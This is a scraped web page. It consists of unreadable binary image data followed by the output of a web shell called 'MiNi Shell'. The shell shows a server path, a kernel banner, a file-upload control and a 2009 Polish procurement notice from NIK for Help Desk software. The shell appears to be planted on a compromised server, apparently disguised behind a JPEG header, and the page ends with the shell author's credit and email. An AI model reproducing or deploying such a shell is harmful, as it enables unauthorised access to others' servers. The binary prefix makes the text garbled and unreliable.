JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090720/115169-N-2009.html

<p class="kh_header"><b>Warszawa: Zakup i wdrożenie oprogramowania dla Help Desku (systemu rejestracji zgłoszeń)</b><br>
<b>Numer ogłoszenia: 115169 - 2009; data zamieszczenia: 20.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Najwyższa Izba Kontroli , ul. Filtrowa 57, 00-950 Warszawa, woj. mazowieckie, tel. 022 4445000, faks 022 4445415, 4445410.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nik.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i wdrożenie oprogramowania dla Help Desku (systemu rejestracji zgłoszeń).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Wykonanie projektu wdrożenia Systemu Informatycznego (Service Desk) zgodnie z wymaganiami zawartymi w Załączniku nr 1 do SIWZ; 2. Przystosowanie systemu do potrzeb Zamawiającego. Zamawiający nie dopuszcza użycia narzędzi nie wchodzących w skład oferowanego systemu informatycznego w celu przystosowania go do potrzeb Zamawiającego; 3. Dostarczenie oprogramowania oferowanego Systemu Informatycznego (Service Desk) oraz systemu bazodanowego  wraz z niezbędnymi licencjami umożliwiającymi jednoczesną pracę 25 operatorom oraz 1800 użytkownikom końcowym w zakresie procesów ITIL (Information Technology Infrastructure Library): Zarządzanie Incydentem, Zarządzanie Konfiguracją, Zarządzanie Problemem, Zarządzanie Zmianą, Zarządzanie Katalogiem Usług, Zarządzanie Poziomem Usług, z dwunastomiesięcznym wsparciem producenta dla powyższego oprogramowania zgodnie z wymaganiami zawartymi w Załączniku nr 1 do SIWZ;  4. Przeniesienie na zamawiającego własności nośników z dostarczonym oprogramowaniem; 5. Instalacja, konfiguracja sprzętu zapewnianego przez Zamawiającego i Oprogramowania oraz przeprowadzenie wdrożenia Systemu Informatycznego (Service Desk) zgodnie z wymaganiami zawartymi w Załączniku nr 1 do SIWZ; 6. Przygotowanie i przeprowadzenie szkoleń dla 4 administratorów i 27 operatorów Systemu Informatycznego (Service Desk) zgodnie z wymaganiami zawartymi w Załączniku nr 1 do SIWZ; 7. Świadczenie usług Gwarancji i Nadzoru Serwisowego nad wdrożonym Systemem Informatycznym zgodnie z wymaganiami zawartymi w Załączniku nr 1 do SIWZ; 8. Dostarczone oprogramowanie (Service Desk) musi: a) posiadać certyfikat PinkVerify w zakresie najnowszych wzorców ITIL v3 na procesy Zarządzanie Incydentem, Zarządzanie Konfiguracją, Zarządzanie Problemem, Zarządzanie Zmianą, Zarządzanie Poziomem Usług oraz znajdować się na liście [PinkVERIFY Toolsets (V3 Model)] https://www.pinkelephant.com/en-GB/PinkVerify/PinkVERIFYTools.htm b) być rozwiązaniem gotowym; modyfikowanie systemu dozwolone jest jedynie w celu przystosowania go do specyfiki i potrzeb Zamawiającego; 9. Po otwarciu ofert Zamawiający zastrzega sobie prawo do wezwania Wykonawcy w celu demonstracji zaoferowanych funkcjonalności Systemu Informatycznego (Service Desk). Wykonawca, do którego Zamawiający zwróci się z prośbą jest zobowiązany zademonstrować daną funkcjonalność w siedzibie Zamawiającego w ciągu 3 dni od wezwania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 48.51.70.00-5, 72.26.30.00-6, 72.26.50.00-0, 72.26.80.00-1, 72.25.32.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy: 1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy; 5. Ocena spełniania ww. warunków nastąpi na podstawie weryfikacji  dokumentów dostarczonych wraz z ofertą, wymienionych w SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie, zgodne z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych Dz. U. z  2007 r. Nr 223, poz. 1655 ze zm. (wzór wg Załącznika nr 2 do SIWZ); 2. Aktualny odpis z właściwego rejestru lub aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 3. Dokumenty potwierdzające zrealizowanie przez wykonawcę minimum dwóch wdrożeń oferowanego systemu informatycznego w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem realizacji stanowiącej przedmiot niniejszego zamówienia z podaniem przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te realizacje zostały wykonane należycie; 4. Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych w szczególności w zakresie posiadanych certyfikatów i odbytych szkoleń dotyczących ITIL: a) Przynajmniej jednego konsultanta z certyfikatem ITIL Service Manager. b) Przynajmniej trzech konsultantów z certyfikatem ITIL Foundation. c) Przynajmniej jednego członka zespołu projektowego z doświadczeniem we wdrażaniu funkcjonalności Zarządzania Incydentami i Zarządzania Konfiguracją w oparciu o oferowane produkty. d) Przynajmniej jednego członka zespołu projektowego z doświadczeniem w co najmniej jednym projekcie we wdrażaniu procesów Zarządzania Incydentami i Zarządzania Konfiguracją. e) Kierownika Projektu z doświadczeniem w co najmniej jednym projekcie we wdrażaniu procesów Zarządzania Incydentami i Zarządzania Konfiguracją w organizacji; 5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 2 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 6. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie 5, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Termin ważności takiego oświadczenia musi być zgodny z podanym w punkcie 5; 7. W przypadku składania oferty przez podmioty występujące wspólnie, podmioty wchodzące w skład konsorcjum, muszą ustanowić pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy; 8 Wymagane oświadczenia i dokumenty określone w punkcie 2 muszą być złożone oddzielnie przez każdy podmiot wchodzący w skład konsorcjum, dokumenty określone w punkcie 1, 3,4 wspólnie przez wszystkie podmioty stanowiące konsorcjum (lub pełnomocnika konsorcjum); 9. Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający, przed zawarciem umowy w sprawie zamówienia publicznego, będzie żądał umowy regulującej współpracę tych wykonawców; 10. Umowa regulująca współpracę Wykonawców składających wspólnie ofertę powinna określać m.in.: a) podmioty składające ofertę, b) cel gospodarczy, dla którego została zawarta umowa, c) zasady reprezentacji i prowadzenia spraw, d) oznaczenie czasu trwania umowy (wymaga się, aby czas trwania umowy był nie krótszy niż okres realizacji zamówienia oraz okres gwarancji); 11. Umowa, o której mowa w pkt. 10  nie może być umową przedwstępną ani umową zawartą pod warunkiem zawieszającym; 12. Jeśli Wykonawca w treści oferty powołuje się na dodatkowe fakty, dotyczące przedmiotu zamówienia, musi dostarczyć dokumenty potwierdzające te fakty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.nik.gov.pl/pl/bip/ogloszenia/1_zamowienia.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Najwyższa Izba Kontroli Departament Gospodarczy Wydział Teleinformatyki, 02-056 Warszawa, ul. Filtrowa 57.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2009 godzina 12:00, miejsce: Najwyższa Izba Kontroli, Departament Gospodarczy Wydział Teleinformatyki, pok.83 02-056 Warszawa, ul. Filtrowa 57.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com